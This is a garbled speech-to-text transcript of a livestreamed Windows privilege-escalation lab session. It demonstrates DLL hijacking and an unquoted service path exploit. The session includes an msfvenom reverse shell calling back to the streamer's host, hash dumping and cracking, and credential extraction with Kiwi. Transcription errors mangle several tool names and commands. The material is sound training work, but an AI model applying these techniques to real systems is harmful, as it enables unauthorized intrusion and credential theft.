cybersecurity? 1 second, Blue Spider Monkey. I'm gonna start getting up and doing like a crap like that or something, you know, in yoga pants. So I work as a network chief in the Marine Corps right now. Which I say right now, you know, I kind of just can't quit, you know, with something like that. But yeah, I work as a network chief in the Marine Corps. I've gone through, I've done Net Plus, Sec Plus, all that crap. And then during a field op, we were doing some stuff and got into someone else's system, and that was really cool to me, really exciting. So I started looking more into it. So I found the EJPT, started doing stuff on Try Hack Me, things like that. Went through EJPT, went through it very quickly, and I was like, "Whoa, we took advance for 24-hour stream." And I was like, "Wow, you know, I actually learned something. Thought I was on top of the world." Went through ECPPT, got knocked back down to "You suck," you know, but completed that one. From there, did the web application penetration testing, the WAPT. That was awesome. And then moved on to a network defense professional, which I really like that. Plan on taking the certified red team professional here soon. And then from there, doing the PNPT. And yeah, then finally OSCP, and hopefully get out. This is really what I aspire to do. So a lot of this is just me learning along with you guys, stuff like that. But cybersecurity wise, some network chief, I do look at a lot of network, you know, different things that happen throughout the network, stuff like that. But I'm not the one that actually, I just send it up. I don't actually respond, you know, and like, you know, start doing like forensics, all that crap on a machine. I'll respond, stuff like that. I'll call it up and everything. If I see something weird, I'll let people know about it, stuff like that. But we don't do like the whole forensics portion of it. We just do networking. So routing, switching, layer 1 through, I'd say like 3.5, 4, because layer 4 you don't really pick. You know, it's either TCP or UDP. You don't really get to pick. But yeah, I just work like that. So let's go ahead and CD into that C temp folder. And let's go ahead and do a wget tac use basic parsing, HTTP 1013.26.184. Greens from Chile. Oh shit. A lot of the true cybersecurity around the world is becoming clear. Thanks for sharing your knowledge. Oh, thank you. Thanks for joining in. We will do a hijack-me.dll. Something else I want to show you guys with this. Let's go ahead and do the out file. Out file hijack-me.dll. Something else I want to show you guys with this hijack-me.dll that we're writing like right here. Oh, no shit, you can't bind to it because wget use basic parsing HTTP. Wait, 10.13.26. Did I close down that Python server? What? Did I do the slashes the wrong way? Yeah. No, I did not. 10.13 HTTP 10.13.26.184, right? Did you really use basic parsing? I've never seen it not be able to use basic parsing. Cannot bind to the parameter URI. Cannot convert value HTTP to that. Am I doing this the wrong way? What am I doing? Invalid URI. What the heck am I doing here? Now I'm super lost for some reason. wget HTTP. Am I just freaking acting like an idiot? Oh my god. I don't know why I just... There. I'm too used to CD back. Right after Raku says, hey, thanks for sharing your knowledge. I can't download a file. No, but so I started making YouTube videos. In the very first YouTube channel, actually, I got shut down by YouTube. And that's where I knew that they were probably good videos. But what I did was, after I did the EJPT, I saw that a lot of people had a lot of questions on routing and things like that. After I did these PPT, I saw a lot of people had questions on mostly like the network side of it. So I started making videos on those kind of things, and it just kind of got bigger and bigger. I mean, I don't have a bunch of followers or anything crazy like that, you know. This ain't freaking John Hammond's YouTube channel, you know, or anything like that, or the Cybermatch or anything like that. But I realized, hey, you know, if I'm studying and learning, might as well do it with other people and learn from them and everything like that. So that's why this all started. So we made that hijack.dll. Now something I want to show you guys, okay, is we see that in here. If we look at it, we have a C program files DLL hijack service. See if I can make that. There you go. How's that? Let's go. Okay. So you see how we have all these different places where it's looking for this hijack.me.dll? Anywhere that we can write to, we can throw that hijack.me.dll in. It looks here first in C program files DLL hijack service hijack.me.dll. Okay, it looks there first, and then it's going to look all the way down, and the last place it's going to look is C temp. We most likely have writable access, right, to C temp. We can most likely write to it. So that's why we're putting it in temp in there, okay? So now when we start up this service, what should technically happen is we should have a new user out of the box with administrator privileges. Is it going to? I don't actually know, because we did the ands and everything like that. We could technically just do multiple of these, right? So let's go ahead and stop and start it. So it started, and we said Jack, right? That's what we said. Let's try net local group administrators. Okay, so Jack did not get into the local group administrators. Let's try logging as him at least. Let's try to do a change user. Ooh, can I right click and try to maybe do a runs administrator, then do Jack? Jack DLL/admin? No, that's not it. Okay. Wonder if I can do a just more. I think we can run a different user, right? Runs a different user. Can I try Jack? And then p_ssw0rd1. Okay, there we go. Who am I? So we know that we got the password for Jack at least to be changed. Now, if we want to continue to mess with this, right? Because we can start and stop that service. Let's just go ahead and write the file again. We could also make a reverse shell. So if you guys want, let's go ahead and make a reverse shell. Windows DLL, okay. So we know that Jack now exists with that password, right? And I tried this end-to-end net local group administrators, but / add jack, but that wasn't working for us. So let's just go ahead and just try to do a net local group administrators / add jack. And we'll just leave it like that. Okay, so we'll put him as administrator, right? So let's go ahead and control X, yes, enter. We'll recompile that into hijack-me.dll. We'll go ahead, we'll get back over into our other guy over here. We'll do a delete hijack-me.dll. What about rename hijack-me.dll something else? Because if we can rename it, there. If we can rename it, now it's not hijack-me.dll. Can't find that, right? There we go. So now let's go ahead and go back into PowerShell and re-download hijack-me.dll in there. And I did recompile it, right? Yeah, okay. I kept forgetting to recompile stuff the other day, so that's why. So now that we re-download that, let's go ahead and go back into command prompt, and we will do a sc stop. Was it DALL DACL, right? DACL service. DAC DLL service. And we'll do an SC start. Alright, it's already stopped, it looks like. Oh, nope, this is the service already running. The requested control is not valid for the service. We actually can't stop the start anymore. SC query DLL service. What we could do is we could restart the box. Could always do something like that. But Matt user John. Net user Jack. So he is in the remote desktop users now, Jack. I wonder if he was always in that though. He may have always been that because we didn't really check that beforehand. Did you? Why did you try to rename the file? Oh, because what I was going to do was I was going to make another hijack-me.dll, restart it, and then put Jack also into the administrators group. That's what I was trying to do, like right there. So that's why we renamed it into one, just so it's not looking for that guy anymore. And I was looking for this guy now, which is my newest file, which put Jack in the administrators group. But we would have to do a shutdown, restart, and everything like that, which I don't think these guys have the permissions to do. Shutdown /R, which he most likely does not have the permission to do. He doesn't. So we could always terminate the box, go back into it, and make it to where, like, user is then put to an administrator. Since we already know his password, we could do something like that to our user's administrator. That'll just be a net local group administrators /add user, and then we could then do more stuff onto there like that. So let's actually have a little more fun with this. Let's go ahead and terminate this box, and we're going to start it back up again. And let's make the user, let's make him a administrator. Let's do that. What's the use tech OA flag with mmap when you can always use TAC file name? I think OA actually prints it out. I don't know, what's the point of the TAC O flag in MSF Venom when you could just do a TAC and then the file name? But OA base name output in 3 major formats at once. Put outputs in the 3 major formats, which is going to be ON, OX, and OS, I believe, which is output scan, normal, XML, nope, not script kiddie. ON, OX, and OG, greppable format. So it's going to output the scan in normal, XML, and greppable for TAC OA. But you could always just do that guy right there also, just like you're saying. Or you could always just append the file if you were trying to append something like ips.txt or something like that. But like MSF Venom, you can save it with TAC O, or you could just save it with a, there you go, you know. Just like we did like right here, I believe. No, we didn't make an MSF Venom. We didn't make a reverse shell yet. Let's go ahead and put Jack into the administrators group this time. So let's go ahead and we're going to hop back into this guy. We're going to say command.exe, net local group administrator. We're going to add user. Not Jack, we're going to add user. So we're going to make user an administrator. That's where our plan is here. We're going to log out, log back in, and he should then be an administrator. So let's go ahead and re-download that guy, or recompile that guy, right? There we go. So he's compiled to hijack-me.dll. Let's go ahead and log back in. And this is just now just going a little bit above and beyond, just having fun with it. After this one, I'm also going to take a quick 5-minute break. Then we'll do our unquoted service path, which we may do. Oh, yeah, we'll do this one because this isn't a whole new box, like right here. Token impersonation, hot potato. We did show this yesterday with tater.ps1, right? We just showed that yesterday with that, okay? And then we have quick wins, run as if it's creds. I do want to get a print screen of that page, like right there. But a lot of these we did do yesterday. But we're just going to have some more fun with this DLL hijacking, like right here. I like DLL hijacking. I like unquoted service paths. Those are just two things I like. User, and it was password 1, I believe it is. Alright, cool. See, Sharma, I know that you're not my dad because you just asked what's the point of the attack away flag, which means that you actually know something about mmap, so. You are no one in my family, I know that much. Alright, Windows PowerShell. Let's go ahead and go into CD and C temp, right? And we'll do a dir. There shouldn't be anything in here anymore because we just restarted this machine. Let's go ahead and do a wget attack use basic parsing http 10.13.26.184 / hijack me.dll. Our file will be hijack me.dll. Now let's go ahead and we will do a I did compile, I got it right. Sorry, that was happened all yesterday. I wasn't compiling them and I kept trying to do stuff and I was like, what is going on? Alright, let's go ahead and command prompt sc stop dll svc, right? Sc start dll svc. Is that what it was? There we go. Net local group administrators. And user is now in the net local group administrators. So what we should technically be able to do now is right click and run as administrator. And we should be able to go down to more choices, type in user, see how user's in here now, user, and his password PASSW0RD1, because we already know his password, right? And we are now an administrator on this box. When did the hacking start? Please don't mind. Please don't mind it. When you did the hacking stuff. Oh no, I'm just messing around. I'm messing with you. Now we're having fun. So now we are an administrator shell here. So yes, user is now an administrator, right? So now what we should tend to be able to do is I should be able to get that process monitor and run it as an administrator. And then you guys can actually see process monitor. I feel like process monitor should already be on this box, but it's not. And we're just gonna have to deal with it like that. Or if it is, then we can't actually see it. So let's go ahead and do a cd into C users user desktop, and we'll do a quick wget use basic parsing http 10.13.26.184 / processmonitor.zip. Out file will be processmonitor.zip, and then we'll do a expand archive. You can also do that one too, Sharma. If you do a exclamation point hack and then type in a username. I think I broke it with expand archive. Oh, there we go. Okay, cool. Expand archive process monitor.zip. Now cd into process monitor.zip dir. And let's go ahead and do procmon64.exe. Let's install this guy. We should be able to install him now because we are an administrator, and he is now installed. So there we go, okay? It's ugly, but that's okay. So what I was talking about earlier was doing filter, right? So let's go ahead and filter. And we are going to filter the, we'll say process name. Is it process name? Yeah, it should be process name, right? Let's see here. And we'll say ends with, we'll say .dll. And we'll add that. Let's go ahead and apply that. And let's see if we have anything over here. So there's nothing over here that the process name ends with .dll. Thought that there would be. Maybe it's not process name. Maybe it is PID relative result. Result should be name not found. We can always do a name not found. And we can just say contains. Let's go ahead and get rid of that. We'll apply that. You not, oh, cancel, add it. Result contains name not found. Apply that. Say OK. Now we have a whole bunch of name not found here, right? Path. I think I want the path to contain .dll. That's why. So filter, filter, and we'll do path, and it's going to ends with .dll. Just invoke night not. Pass the hash at nightbot. We'll add that out of there, right? Apply that. We'll say OK. Now all of these DLLs cannot be found. I mean, you can do this to yourself, but you're going to see a whole bunch of DLLs that can't be found. Now, we obviously did just add that DLL in there that we've been messing with. So it's found, right? It's there. It's not the correct DLL, but by God, it's there, right? That hash also, just so you know, it's like this is blasphemy, this is madness or something like that. I forget what that hash actually is, but that is a hash. It's not from an assessment or anything crazy like that. Nothing that, is from like my home computer or anything like that. But that was one of the hashes used in a Certified Red Team Professional, not the exam. Before everyone's, right, not the exam. It's used in the class for it, that hash, like right there, whenever you pass the hash. So I want to copy like a real hash, so we did that one. So you can try to crack it if you want. All right, so we see all these name not found DLLs, and that's what we're doing. Okay, what we're doing is we're overwriting somewhere where we can actually write to, which System 32 we most likely cannot write to. I don't know if we can write to C Windows. I have no idea. As an administrator, we most likely can, and maybe have a reverse shell come back to us. We could try it for airmon-ng DLL. We could try something like that. And we could try to do I don't know what it's actually even trying to run. Like what the process for it even is for airmon-ng DLL. Process name is explorer.exe. So we could try to do the restart for explorer.exe. Stop it and then start it. We could try it. Let's go ahead and see if we can even stop that first. If the screen goes black, we stop it. Command prompt sc stop explorer.exe. Explorer. No, nope, okay. Doesn't look like we can that's the process name. We'd have to do some more research into that process right there. Alright. But those are all missing DLLs. All we did was we just overwrote one of those missing DLLs. So then whenever we start that service, it went and found that DLL, right? Let's continue on. We'll terminate that box. You can also make a reverse shell if you want to with him. All right, some of that. Encore the service pass. All right, let's go ahead and start this guy up. While this guy's starting up, I'm going to go ahead and take a quick 5-minute break. Shouldn't take very long. So I'm going to take a couple minutes. I actually want to grab this like right here. Just so I have the .c file at all times. DLL hijacking, boom, boom. Just so I don't have to type out everything there. Let's do something like this. Just so I don't have to type it out every single time, you know? Because I have to do another DLL hijacking, then there we go. Alright, cool. I'm going to take a 5-minute break. I'll be right back. Anybody else patch the hash? Alright, let's go ahead. Let's continue on with this thing, right? So, we're going to go ahead. We're going to do a quick unclosed service path. So let's go ahead and copy that. Alright. And let's remote desktop into him. We'll say yes. Username is going to be user, and we have password 1. Okay. Sean, I think you're the only one left in here. pass hash on myself. Alright, so what we can do with this is we can use power up again. We're going to put it into memory, right? So we're going to invoke expression, invoke web request. We'll throw it into memory. Invoke expression, invoke web request. Let's try it. Let's see if we can actually get that error. HTTP 10.13.26.184. Let's see if we get that error that's not. Yeah, we can't do it. Power up. Hopefully we do. Just so you guys can see it. PS1. Hopefully we get an MSI error too. Nope, we didn't get that error. Okay, so we don't have to use basic parsing on this one either. So we got that right. We got our power up. Let's go ahead and do an invoke all checks. You know what? We're not actually doing invoke all checks. I'm going to teach you guys something on here. Okay. So if you get in that PowerShell hell where you made an interpreter session, let's say, and you're in command prompt, right? You type in PowerShell and it just sits there on a black screen. And you're like, what is this? Right? You can't do anything. You just have to exit out. You have to figure out how to do everything within freaking command prompt, right? So there is a way around that. Okay. What we can do is we can go ahead and we can nano, let's say power up. We're trying to use power up, let's say, okay? Let's go down to the bottom and we can give it the command that we want to run. And when we do that invoke expression, invoke web request, it'll run that command. So invoke web request. So all we gotta do is invoke, or if we, let's say, put it on the machine, like with like a wget, or we upload it because we're in a interpreter shell, right? We upload and then we just run it, right? We can say invoke, we say, because we go in command prompt and we tell it PowerShell, and then we tell it what file to run, right? So we type something like PowerShell, and then we would type something like powerup.ps1, or it might be a period slash powerup.ps1, and it'll run that, right? Powerup, whatever. So if you're in that PowerShell hell, you can run it from command prompt, okay? We're just going to say invoke all checks. We're going to put this at the very bottom, because whenever we get this file now, what's going to happen is he's going to now run that command at the very bottom. Since we exit out of that PowerShell, we have now lost what we had in memory. So we got to do an IEX. Well, we can actually just press up because PowerShell is cool like that. Or if you exit out and you press up, it'll still be there. So whenever you get on a box that utilizes PowerShell like that, start pressing up and see if you can. I've actually found the commands that were ran on the box itself, like kind of like to make the box or like the person checking it. I've actually found those on PowerShell just by pressing up, which I thought was pretty funny. So I saw what they've ran before. So if we do that again, it should actually run our invoke all checks now, and there it goes. Okay. So we do. We have an unquoted service path, right? Like right here. We also have an always install elevated. That's not good either. We'll show how to do something with that. That's in the other video also. But we have an unquoted service path here. Now there's a couple things we can do with this. All right. It looks like it's going to common files, so we're gonna have to name it common.exe. All right. And all an unquoted service path is, I believe I explained in the other video, is there's literally not quotes around the service path. So each time it goes into somewhere, it's looking for the file. All right. So when it gets into common files, it's looking for common.exe, and then it finally gets into unquoted path service.exe, and it finally runs it. Okay. So we're actually going to make an executable called common.exe, and we're going to throw it into that common files area. All right. I believe you actually saw this exact one. We did this exact one just the other day. So we also did that right user MSI, and we also have checking for all logon credentials registry. We already have some Marcus and pass 1, 2, 3, 4, 5, 6, 7, 8. I don't know if we're actually supposed to see those or not. Let's see. It doesn't look like it. Okay. So I want to first see, which I don't think it's going to work because we did this one just the other day. I want to first see if we can actually do a invoke service abuse on this guy up here first. I want to see if we can do that first. So invoke service abuse on unquoted service. Invoke service abuse. I believe it's tag name. Service name. Unquoted service. Can we do a tag command? We can. Let's say net. We'll do a net local group administrators, STRATR administrators /add user. Let's try that. Let's do user /add. How about that? So I'm used to newer PowerShells and everything like that. Let's try that first. Okay, can't do that. That's okay. So let's go ahead and let's make a malicious file called common.exe now. So we'll do an MSF Venom. Do you guys want to execute a command? Do you guys want an interpreter shell? We can do an interpreter shell. Interpreter, Windows interpreter, reverse TCP, and as you can see, we'll call it common.text. Output, we'll do 6666. Actually, we'll make it realistic. We'll do 53. All right. L host is going to be 10.13.26.184, right? That's me. And we'll do that. And let's go ahead and I'll start up an MSF console. We'll use exploit multi-handler. Use exploit multi-handler. Set the payload to this like right here, right? Set the L host to ton 0. Set the L port to 53. You can go ahead and run that. And now we gotta get that file over to here, right? So we are going to put that file. We made that common.exe, right? We want to put that file in, I believe it's common files area. I believe that's where we're gonna put it at, if I remember correctly. So let's go ahead and see. We have right privileges on there. So what would the file there execute would be? Would place in that folder. Okay, common.exe. So we're going to place an unquoted path service. My fault. So let's go ahead and look at unquoted path service. So we're going to cd into C, program files, unquoted path service, and we're going to do a wget for HTTP 10.13.26.184 / and we call that common.exe. Might want to make an out file. Might actually want to tell us something, right? I'm glad it's 200 though. There we go. We'll name it common.exe. So if we do a dir in here now, we can see that we do have common.exe in here now. All right. Now all we got to do is we have to restart that service, right? And I believe it was called this right here. So we're going to go ahead and we're going to go to command prompt, sc stop that guy. Service has not been started, sc start that guy. And he started, he's kind of hanging there. That's a good thing. Hopefully we get a call back over here. It might take a few seconds or a minute or so. We'll leave both pages open, and we do. We get a call back over here, get UID, and we are NT authority system. Hash dump, obviously you always want to do that. Oh, okay. Maybe I can't do a hash dump for some reason. Let's go ahead and see if we can migrate to a PS, migrate into something a little bit better here. We are running on x64, and we ran it as an x86 thing. So let's go ahead. We're going to run that one more time, actually. We're going to try to restart that again. And we're going to migrate into something better here. We'll do a spool service 2624. So we just got to migrate quickly. We're going to do a migrate, or we can just make a whole new payload, either one. But I'm just going to migrate real quickly and see if we can do that. Okay, cool. We migrated, so we're good with that, right? Let's try to do a hash dump now. Can we do that? We can. So there we go. So obviously we want to take all these hashes like right here. We'd obviously want to do a nano hash.text. All right, I already have a bunch of hashes in there. We'll go ahead and throw these guys in there also. Control X, yes. John, hash.text, wordless, rocky.text. I know my face is in the way. Tac format equals. Let's go ahead and clear that, and we'll do John, hash.text, wordless, rocky.text, right? Fork equals 4, makes it go faster, and format equals NT. So the only thing we were able to crack was password 1. The other ones we already cracked from yesterday, other passwords, but the only new one that we were able to crack was user password 1, which we already know. That's okay. We're NT authority system. So now we can load Kiwi and do all the other crap that we want to do, right? Creds all, LSA dump, you know, all that good stuff. We did find Marcus on there, even though Marcus is an actual user on here, right? So we could try for LSA dump Sam. And we can do an LSA dump secret on here. And we can just start going through and just start to look at everything, right? That's not good. Change my host name. Change my host name. We could do an LSA dump secrets. And we can just start doing everything. Start looking at everything and all that good stuff on here, right? But that is unquote service pass. So we were able to go in there and do that. And we are NT authority system. So we can really do whatever hell we want because we're God mode now on that computer, right? Now we have our token impersonation. All right. So do we actually have that on here? Who am I / Priv? Can we actually do a token impersonation on here? Bypass trend? No, we cannot. So why'd you tell us that? Because we need, for token impersonation, we need impersonate client after authentication, which we don't have. Which we did show that in the videos before this. I don't know why we have it on here if we can't do it. I know what we can do is we could do always we could always see what else this guy is vulnerable to, right? And search for suggester. Use 0, which you guys saw me do this the other day also. Session tag I, set session to 2, and we'll go ahead and run that. And remember yesterday we also ran on x86 and x64 depending on what payload we set up. And then lastly we have quick wins. All right. We did see some quick wins in there. We did see a password, although that user wasn't even on the machine anymore. But these are some quick wins that we can run, like right here, right? So I'm actually going to go ahead and take a print screen of this guy, like right here, this quick wins. And we're just going to kind of go from there. Always install elevated, which we did do that the other day also. So last thing I'm going to do is a quick wins. I know this is all not part of system info, but that's okay. I understand my notes. That's all that matters, right? We have that. We have this like right here. And we have these last couple guys like right here. I'm just going to go ahead. Okay, if they're the same thing. So we got some quick wins, things like that. I don't know if any of these are actually going to work. We can try them. All right, we could try to run as save cred user admin. We can try to run some of that. But that's the MSI file. That's for if we are always install elevated. We have saved creds, registry keys. We could always look in there. It's obviously a lot of stuff coming down. So we kind of look through this guy, maybe even save them, send them back to our Linux machine, and then maybe do something like a grep or something like that for password. But it looks like there's a lot of passwords in here, a lot of words that are at least password in here, stuff like that. We tried to get some quick wins yesterday. Those didn't really work too well for us. We can go through here and see if there's anything crazy that really points out to us, something like that. And we also have, instead of HKLM, we also have HKCU. We can try that one like right there. Maybe I didn't copy him. I'm about to say we shouldn't have as much in here. Password sync. Just see if there's anything in here that stands out to me, you know what I'm saying? There we go. Password 321. That's in software assignment Tatum putty sessions. So there was a putty session that they used password 321 on. Right there, I'll try to use aircrack-ng maybe, and send, you know, have like a little username list. If I did a net user, I have this username list like right here, and then maybe try to use password 321, add everybody, right? Maybe something like that, you know. I wonder if we actually do a hash.text tac show tac format equals nt. We do something like that. So 9 password hashes cracked, 7 left. So does it actually show what we cracked here? Yeah, it does. So Ryan's password 1, test password 1, user password 321. I'm just seeing if we cracked anyone else. Password 1. Bob password. Okay. So nothing crazy in there. Alright. Then we can also run as saved creds. So if we have saved creds, right, we could try that. So command key /list. If we have any saved creds, we can try to run something as those saved creds. There's none currently saved. So we could try to run that as saved creds, and we could try to run something as that. which will then allow us to run it and not actually know the user's credentials. So that is going to be it for me today. Let's go ahead and check out this InfoSec, see who else is on. DZ64 is on, which I think he actually just hopped into here and said what's up. So awesome, thank you. We'll raid him. Small raid, obviously. Not gonna be anything large. We got a nice little USA ad. That's nice. I had USA for like a little bit, but nothing crazy. Yeah, small raid, but that's okay. I like how 4 viewers already, but it only shows that I have 3 viewers watching. I always find that funny. All right, you guys have a good one and have a good day.